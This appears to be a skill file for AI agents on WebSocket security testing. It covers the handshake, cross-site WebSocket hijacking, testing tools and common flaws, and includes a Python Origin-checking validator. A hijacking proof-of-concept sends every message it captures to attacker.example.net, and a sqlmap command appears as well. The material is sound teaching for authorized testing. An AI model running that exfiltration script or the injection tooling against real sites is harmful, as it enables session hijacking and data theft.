websocket-security

SKILL: WebSocket Security

AI LOAD INSTRUCTION: This skill covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical tooling bridges, and common vulnerability classes. Apply only in authorized tests; treat tokens and message content as sensitive. For REST/GraphQL companion testing, cross-load api-sec when present in the workspace.

0. QUICK START

During proxy or raw traffic review, watch for:

```http
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocol
```

Server success response indicators:

```http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
```

Routing hint: in Burp or the browser DevTools, filter for `101` responses and `Upgrade: websocket`; for deeper API testing, align the authentication and authorization model from the `api-sec` skill.

1. PROTOCOL BASICS

Client request (typical)

  • `Upgrade: websocket` and `Connection: Upgrade` — the required upgrade handshake.
  • `Sec-WebSocket-Key` — a base64 nonce; the server hashes it together with a fixed magic GUID and returns the result in `Sec-WebSocket-Accept`.
  • `Sec-WebSocket-Version: 13` — the current standard version for browser interoperability.

Server response

  • `HTTP/1.1 101 Switching Protocols` — handshake complete; subsequent frames are WebSocket text/binary frames per RFC 6455.

Minimal conceptual flow:

```text
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, close
```

2. CROSS-SITE WEBSOCKET HIJACKING (CSWSH)

Condition

  • The server does not validate `Origin` (or an equivalent binding) on the WebSocket handshake, and
  • the victim has an active session (cookie-based or browser-stored credentials) with the target site.

Then a malicious page loaded in the victim's browser may open a WebSocket as the victim, similar in spirit to CSRF but over a persistent bidirectional channel.
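The server-side counterpart of the two conditions above, as an added example that is not part of the original skill: a handshake validator that completes the RFC 6455 key exchange only for an allowlisted `Origin`. `ALLOWED_ORIGINS` and the constructed `SAMPLE_REQUEST` (assembled from the sample headers in section 0) are assumptions of this example.

```python
import base64
import hashlib

# Fixed GUID from RFC 6455 that the server appends to Sec-WebSocket-Key before hashing.
WS_MAGIC_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Origins allowed to open a socket: a hypothetical allowlist for this example.
ALLOWED_ORIGINS = {"https://app.example.com"}

# Constructed upgrade request, assembled from the sample headers shown in the text.
SAMPLE_REQUEST = "\r\n".join([
    "GET /messages HTTP/1.1", "Host: vulnerable.example.com",
    "Upgrade: websocket", "Connection: Upgrade",
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==", "Sec-WebSocket-Version: 13",
    "Origin: https://app.example.com", "", "",
])


def compute_accept(sec_websocket_key: str) -> str:
    """Sec-WebSocket-Accept = base64(SHA-1(key + GUID)), RFC 6455 section 4.2.2."""
    digest = hashlib.sha1((sec_websocket_key + WS_MAGIC_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def parse_headers(raw_request: str) -> dict:
    """Map lowercased header names to values, stopping at the blank line that ends them."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def handshake_response(raw_request: str) -> str:
    """Server response: 400 if malformed, 403 if Origin missing/not allowlisted (CSWSH), else 101."""
    h = parse_headers(raw_request)
    well_formed = (h.get("upgrade", "").lower() == "websocket"
                   and "upgrade" in h.get("connection", "").lower()
                   and h.get("sec-websocket-version") == "13"
                   and bool(h.get("sec-websocket-key")))
    if not well_formed:
        return "HTTP/1.1 400 Bad Request\r\n\r\n"
    # Browsers always send Origin; rejecting a missing or foreign value is what stops a
    # third-party page from riding the victim's cookies into a live channel.
    if h.get("origin") not in ALLOWED_ORIGINS:
        return "HTTP/1.1 403 Forbidden\r\n\r\n"
    accept = compute_accept(h["sec-websocket-key"])
    return ("HTTP/1.1 101 Switching Protocols\r\nUpgrade: websocket\r\n"
            f"Connection: Upgrade\r\nSec-WebSocket-Accept: {accept}\r\n\r\n")
```

Computing the Accept value from the sample key reproduces the `s3pPLMBiTxaQ9kYGzzhZRbK+xOo=` shown in the quick-start response, so the same function doubles as a check that a captured 101 really came from a server that processed the client's key.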

Proof-of-concept pattern (laboratory / authorized target only)

```javascript
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
  fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};
```

Testing notes: confirm whether `Origin` is checked, whether cookies are sent (`SameSite` rules), and whether a subprotocol or custom headers are required — missing checks increase CSWSH risk.

3. TESTING WITH TOOLS

wsrepl

```bash
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.py
```

Use a plugin to reproduce browser cookies, headers, or token refresh during the WebSocket lifecycle.

ws-harness (bridge to HTTP for other tools)

```bash
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txt
```

Example downstream use with SQL injection tooling over the bridged HTTP surface (adjust the URL to the local listener):

```bash
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch
```

Burp Suite ecosystem

  • SocketSleuth — inspect and manipulate WebSocket traffic inside Burp.
  • WebSocket Turbo Intruder — high-rate or scripted message fuzzing.

4. COMMON VULNERABILITIES

| Issue | Why it matters |
| --- | --- |
| Missing `Origin` validation | Enables CSWSH from attacker-controlled pages |
| Auth token in URL (`wss://host/ws?token=...`) | Logs, proxies, Referer leakage, browser history |
| No rate limiting on messages | Abuse, brute force, DoS |
| `ws://` instead of `wss://` | Cleartext on the wire (MITM) |
| Injection in message bodies | SQLi, command injection, or XSS if content is stored/reflected elsewhere |

Example sensitive URL anti-pattern:

```text
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
```

Prefer `Sec-WebSocket-Protocol`, first-message auth, or cookie + CSRF token patterns aligned with product constraints.

5. DECISION TREE

  1. Identify endpoint — from JS bundles, Swagger, or `101` responses; note `wss` vs `ws`.
  2. Handshake review — are `Origin`, `Host`, and Cookie policies correct? Any token in the query string?
  3. Session binding — reconnect with another user's cookie jar in Burp; compare subscription topics and data leakage.
  4. CSWSH — load a local HTML page that connects to the target with the victim session active; verify the server rejects a wrong `Origin` or uses a non-cookie secret.
  5. Message semantics — fuzz JSON/text payloads for injection; mirror the same logic as HTTP API testing.
  6. Transport — flag `ws://` in production; verify TLS and HSTS alignment.

6. RELATED ROUTING

  • From api-sec — authentication, authorization, IDOR, and rate limiting often mirror the HTTP APIs behind the same WebSocket routes.
    Note: WebSocket endpoints commonly share their session and permission model with REST; align authentication and resource boundaries for the same backend from the `api-sec` skill.